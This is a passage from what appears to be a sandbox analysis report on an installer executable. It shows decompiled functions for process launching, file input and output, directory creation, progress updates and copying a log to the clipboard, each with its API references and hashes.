                            • Opcode Fuzzy Hash: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (image not reproduced)
                            C-Code - Quality: 69%
                            			E00401389(signed int _a4) {
                            				intOrPtr* _t6;
                            				void* _t8;
                            				void* _t10;
                            				signed int _t11;
                            				void* _t12;
                            				signed int _t16;
                            				signed int _t17;
                            				void* _t18;
                            
                            				_t17 = _a4;
                            				while(_t17 >= 0) {
                            					_t6 = _t17 * 0x1c +  *0x434f30;
                            					if( *_t6 == 1) {
                            						break;
                            					}
                            					_push(_t6); // executed
                            					_t8 = E00401434(); // executed
                            					if(_t8 == 0x7fffffff) {
                            						return 0x7fffffff;
                            					}
                            					_t10 = E0040136D(_t8);
                            					if(_t10 != 0) {
                            						_t11 = _t10 - 1;
                            						_t16 = _t17;
                            						_t17 = _t11;
                            						_t12 = _t11 - _t16;
                            					} else {
                            						_t12 = _t10 + 1;
                            						_t17 = _t17 + 1;
                            					}
                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                            						 *0x433eec =  *0x433eec + _t12;
                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                            					}
                            				}
                            				return 0;
                            			}

                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (image not reproduced)
                            C-Code - Quality: 100%
                            			E00405B20(WCHAR* _a4) {
                            				struct _PROCESS_INFORMATION _v20;
                            				int _t7;
                            
                            				0x430270->cb = 0x44;
                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                            				if(_t7 != 0) {
                            					CloseHandle(_v20.hThread);
                            					return _v20.hProcess;
                            				}
                            				return _t7;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3712363035-0
                            • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                            • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                            • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                            • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (image not reproduced)
                            C-Code - Quality: 100%
                            			E0040690A(signed int _a4) {
                            				struct HINSTANCE__* _t5;
                            				signed int _t10;
                            
                            				_t10 = _a4 << 3;
                            				_t8 =  *(_t10 + 0x40a3e0);
                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                            				if(_t5 != 0) {
                            					L2:
                            					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                            				}
                            				_t5 = E0040689A(_t8); // executed
                            				if(_t5 == 0) {
                            					return 0;
                            				}
                            				goto L2;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             Control-flow Graph (image not preserved; legend: Executed / Not Executed)
                             • Block 543: 40602d-406059 GetFileAttributesW CreateFileW
                             C-Code - Quality: 68%
                             			// Opens _a4 with access _a8 and creation disposition _a12, sharing FILE_SHARE_READ (1).
                             			// The file's current attributes are passed through as dwFlagsAndAttributes; the
                             			// "sbb ecx, ecx" idiom is a branchless select that yields 0 when GetFileAttributesW
                             			// returned INVALID_FILE_ATTRIBUTES (0xffffffff), so a missing file is created with
                             			// default attributes. The expression below is the decompiler's rendering of that select.
                             			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                             				signed int _t5;
                             				void* _t6;
                             
                             				_t5 = GetFileAttributesW(_a4); // executed
                             				asm("sbb ecx, ecx");
                             				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                             				return _t6;
                             			}

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             Control-flow Graph (image not preserved; legend: Executed / Not Executed)
                             • Block 544: 406008-406018 GetFileAttributesW
                             • Block 545: 406027-40602a
                             • Block 546: 40601a-406021 SetFileAttributesW
                             • Edges: 544->545, 544->546, 546->545
                             C-Code - Quality: 100%
                             			// Clears the read-only bit of _a4: FILE_ATTRIBUTE_READONLY is 0x1, so masking with
                             			// 0xfe keeps every other attribute. Skipped when the file does not exist
                             			// (INVALID_FILE_ATTRIBUTES). Returns the attributes as originally read.
                             			E00406008(WCHAR* _a4) {
                             				signed char _t3;
                             				signed char _t7;
                             
                             				_t3 = GetFileAttributesW(_a4); // executed
                             				_t7 = _t3;
                             				if(_t7 != 0xffffffff) {
                             					SetFileAttributesW(_a4, _t3 & 0x000000fe); // drop FILE_ATTRIBUTE_READONLY only
                             				}
                             				return _t7;
                             			}

                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             Control-flow Graph (image not preserved; legend: Executed / Not Executed)
                             • Block 547: 405aeb-405af9 CreateDirectoryW
                             • Block 548: 405afb-405afd
                             • Block 549: 405aff GetLastError
                             • Block 550: 405b05
                             • Edges: 547->548, 547->549, 548->550, 549->550
                             C-Code - Quality: 100%
                             			// CreateDirectoryW wrapper: returns 0 on success, otherwise the Win32 error code.
                             			// The recorded call sites pass paths under the user's %TEMP% (see the APIs list below).
                             			E00405AEB(WCHAR* _a4) {
                             				int _t2;
                             
                             				_t2 = CreateDirectoryW(_a4, 0); // executed
                             				if(_t2 == 0) {
                             					return GetLastError();
                             				}
                             				return 0;
                             			}

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                            • GetLastError.KERNEL32 ref: 00405AFF
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             C-Code - Quality: 100%
                             			// WriteFile wrapper. _a12 holds the byte count on entry and is reused as the
                             			// lpNumberOfBytesWritten out-parameter; returns 1 only if every byte was written.
                             			E004060DF(void* _a4, void* _a8, long _a12) {
                             				int _t7;
                             				long _t11;
                             
                             				_t11 = _a12;
                             				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                             				if(_t7 == 0 || _t11 != _a12) { // API failure or short write
                             					return 0;
                             				} else {
                             					return 1;
                             				}
                             			}

                            APIs
                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             C-Code - Quality: 100%
                             			// ReadFile counterpart of E004060DF: _a12 is the requested byte count and is reused
                             			// as lpNumberOfBytesRead; a failure or a short read (for example at EOF) returns 0.
                             			E004060B0(void* _a4, void* _a8, long _a12) {
                             				int _t7;
                             				long _t11;
                             
                             				_t11 = _a12;
                             				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                             				if(_t7 == 0 || _t11 != _a12) { // API failure or short read
                             					return 0;
                             				} else {
                             					return 1;
                             				}
                             			}

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             C-Code - Quality: 100%
                             			// Seeks the global file handle stored at 0x40a018 (the handle E00403B12 closes)
                             			// to absolute offset _a4; dwMoveMethod 0 is FILE_BEGIN.
                             			E004034E5(long _a4) {
                             				long _t2;
                             
                             				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                             				return _t2;
                             			}

                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             C-Code - Quality: 78%
                             			// Launches a child process and records the outcome. _t15 evidently holds 0 (it is the
                             			// comparand for every null/zero test), _t22 is the frame pointer (locals live at
                             			// _t22 - 4, - 0xc, - 0x28, - 0x2c); _t7 and _t19 are decompiler temporaries that
                             			// the original listing used without declaring, with types inferred from their use.
                             			E00401FA4() {
                             				intOrPtr _t7;
                             				void* _t9;
                             				intOrPtr _t13;
                             				void* _t15;
                             				void* _t17;
                             				intOrPtr _t19;
                             				void* _t20;
                             				void* _t22;
                             
                             				_t19 = E00402DA6(_t15); // fetch the command-line string parameter
                             				E0040559F(0xffffffeb, _t7); // status/log UI update (lstrlenW, SetWindowTextW, SendMessageW)
                             				_t9 = E00405B20(_t19); // executed; CreateProcessW, returns the process handle or 0
                             				_t20 = _t9;
                             				if(_t20 == _t15) {
                             					 *((intOrPtr*)(_t22 - 4)) = 1; // launch failed: set the local error flag
                             				} else {
                             					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                             						_t13 = E004069B5(_t17, _t20); // WaitForSingleObject + GetExitCodeProcess
                             						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                             							if(_t13 != _t15) {
                             								 *((intOrPtr*)(_t22 - 4)) = 1; // non-zero exit code counts as an error
                             							}
                             						} else {
                             							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13); // wsprintfW: store the exit code as text
                             						}
                             					}
                             					_push(_t20);
                             					CloseHandle();
                             				}
                             				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4)); // accumulate into the global error flag
                             				return 0;
                             			}

                            APIs
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                              • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                              • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                              • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                            • String ID:
                            • API String ID: 2972824698-0
                            • Opcode ID: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                            • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                            • Opcode Fuzzy Hash: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                            • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                             Uniqueness
                             • Uniqueness Score: -1.00%

                             C-Code - Quality: 100%
                             			// Shutdown path: closes the global file handle at 0x40a018 if it is open and resets
                             			// it to INVALID_HANDLE_VALUE (the |= 0xffffffff), then calls E00403B57 and
                             			// E00405C49 with the buffer at 0x443000 and the value 7.
                             			E00403B12() {
                             				void* _t1;
                             				signed int _t6;
                             
                             				_t1 =  *0x40a018; // 0xffffffff
                             				if(_t1 != 0xffffffff) {
                             					CloseHandle(_t1);
                             					 *0x40a018 =  *0x40a018 | 0xffffffff;
                             					_t6 =  *0x40a018;
                             				}
                             				E00403B57();
                             				return E00405C49(_t6, 0x443000, 7);
                             			}

                            APIs
                            • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                            • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                            • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                            • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                             Uniqueness
                             • Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                            				struct HWND__* _v8;
                            				long _v12;
                            				struct tagRECT _v28;
                            				void* _v36;
                            				signed int _v40;
                            				int _v44;
                            				int _v48;
                            				signed int _v52;
                            				int _v56;
                            				void* _v60;
                            				void* _v68;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				struct HWND__* _t94;
                            				long _t95;
                            				int _t100;
                            				void* _t108;
                            				intOrPtr _t130;
                            				struct HWND__* _t134;
                            				int _t156;
                            				int _t159;
                            				struct HMENU__* _t164;
                            				struct HWND__* _t168;
                            				struct HWND__* _t169;
                            				int _t171;
                            				void* _t172;
                            				short* _t173;
                            				short* _t175;
                            				int _t177;
                            
                            				_t169 =  *0x433ee4;
                            				_t156 = 0;
                            				_v8 = _t169;
                             				if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
                             					if(_a8 == 0x405) { // WM_USER+5: run E00405672 on a new thread, passing control id 0x3ec
                             						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                            					}
                             					if(_a8 != 0x111) { // 0x111 = WM_COMMAND
                             						L17:
                             						_t171 = 1;
                             						if(_a8 != 0x404) { // 0x404 = WM_USER+4
                             							L25:
                             							if(_a8 != 0x7b) { // 0x7b = WM_CONTEXTMENU: offer to copy the list contents to the clipboard
                             								goto L20;
                             							}
                             							_t94 = _v8;
                             							if(_a12 != _t94) { // only for the list-view window stored at 0x433ee4
                             								goto L20;
                             							}
                             							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156); // LVM_GETITEMCOUNT
                             							_a8 = _t95;
                             							if(_t95 <= _t156) { // nothing to copy
                             								L36:
                             								return 0;
                             							}
                             							_t164 = CreatePopupMenu();
                             							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1)); // one item, id 1, label from E0040657A
                            							_t100 = _a16;
                            							_t159 = _a16 >> 0x10;
                            							if(_a16 == 0xffffffff) {
                            								GetWindowRect(_v8,  &_v28);
                            								_t100 = _v28.left;
                            								_t159 = _v28.top;
                            							}
                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                            								_v60 = _t156;
                            								_v48 = 0x42d268;
                            								_v44 = 0x1000;
                            								_a4 = _a8;
                            								do {
                            									_a4 = _a4 - 1;
                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                            								} while (_a4 != _t156);
                            								OpenClipboard(_t156);
                            								EmptyClipboard();
                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                            								_a4 = _t108;
                            								_t172 = GlobalLock(_t108);
                            								do {
                            									_v48 = _t172;
                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                            									 *_t173 = 0xd;
                            									_t175 = _t173 + 2;
                            									 *_t175 = 0xa;
                            									_t172 = _t175 + 2;
                            									_t156 = _t156 + 1;
                            								} while (_t156 < _a8);
                            								GlobalUnlock(_a4);
                            								SetClipboardData(0xd, _a4);
                            								CloseClipboard();
                            							}
                            							goto L36;
                            						}
                            						if( *0x433ecc == _t156) {
                            							ShowWindow( *0x434f08, 8);
                            							if( *0x434f8c == _t156) {
                            								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                            							}
                            							E00404472(_t171);
                            							goto L25;
                            						}
                            						 *0x42ba38 = 2;
                            						E00404472(0x78);
                            						goto L20;
                            					} else {
                            						if(_a12 != 0x403) {
                            							L20:
                            							return E00404500(_a8, _a12, _a16);
                            						}
                            						ShowWindow( *0x433ed0, _t156);
                            						ShowWindow(_t169, 8);
                            						E004044CE(_t169);
                            						goto L17;
                            					}
                            				}
                            				_v52 = _v52 | 0xffffffff;
                            				_v40 = _v40 | 0xffffffff;
                            				_t177 = 2;
                            				_v60 = _t177;
                            				_v56 = 0;
                            				_v48 = 0;
                            				_v44 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				_t130 =  *0x434f10;
                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                            				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                            				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                            				_t134 = GetDlgItem(_a4, 0x3f8);
                            				 *0x433ee4 = _t134;
                            				_v8 = _t134;
                            				E004044CE( *0x433ed0);
                            				 *0x433ed4 = E00404E27(4);
                            				 *0x433eec = 0;
                            				GetClientRect(_v8,  &_v28);
                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                            				if(_a8 >= 0) {
                            					SendMessageW(_v8, 0x1001, 0, _a8);
                            					SendMessageW(_v8, 0x1026, 0, _a8);
                            				}
                            				if(_a12 >= _t156) {
                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                            				}
                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                            				_push(0x1b);
                            				E00404499(_a4);
                            				if(( *0x434f18 & 0x00000003) != 0) {
                            					ShowWindow( *0x433ed0, _t156);
                            					if(( *0x434f18 & 0x00000002) != 0) {
                            						 *0x433ed0 = _t156;
                            					} else {
                            						ShowWindow(_v8, 8);
                            					}
                            					E004044CE( *0x433ec8);
                            				}
                            				_t168 = GetDlgItem(_a4, 0x3ec);
                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                            				if(( *0x434f18 & 0x00000004) != 0) {
                            					SendMessageW(_t168, 0x409, _t156, _a12);
                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                            				}
                            				goto L36;
                            			}

                            Address column of the decompiled function (per-statement addresses from 0x004056e6 to 0x00405a67); its alignment with the C-code statements above was lost in extraction.

                            APIs
                            • GetDlgItem.USER32 ref: 0040573C
                            • GetDlgItem.USER32 ref: 0040574B
                            • GetClientRect.USER32(?,?), ref: 00405788
                            • GetSystemMetrics.USER32 ref: 0040578F
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                            • GetDlgItem.USER32 ref: 0040584C
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                            • GetDlgItem.USER32 ref: 0040575A
                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                            • GetDlgItem.USER32 ref: 0040589E
                            • CreateThread.KERNEL32 ref: 004058AC
                            • CloseHandle.KERNEL32(00000000), ref: 004058B3
                            • ShowWindow.USER32(00000000), ref: 004058D7
                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                            • ShowWindow.USER32(00000008), ref: 00405926
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                            • CreatePopupMenu.USER32 ref: 0040596B
                            • AppendMenuW.USER32 ref: 0040597F
                            • GetWindowRect.USER32 ref: 0040599F
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                            • OpenClipboard.USER32(00000000), ref: 00405A00
                            • EmptyClipboard.USER32 ref: 00405A06
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                            • GlobalLock.KERNEL32 ref: 00405A1C
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                            • SetClipboardData.USER32 ref: 00405A5B
                            • CloseClipboard.USER32 ref: 00405A61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
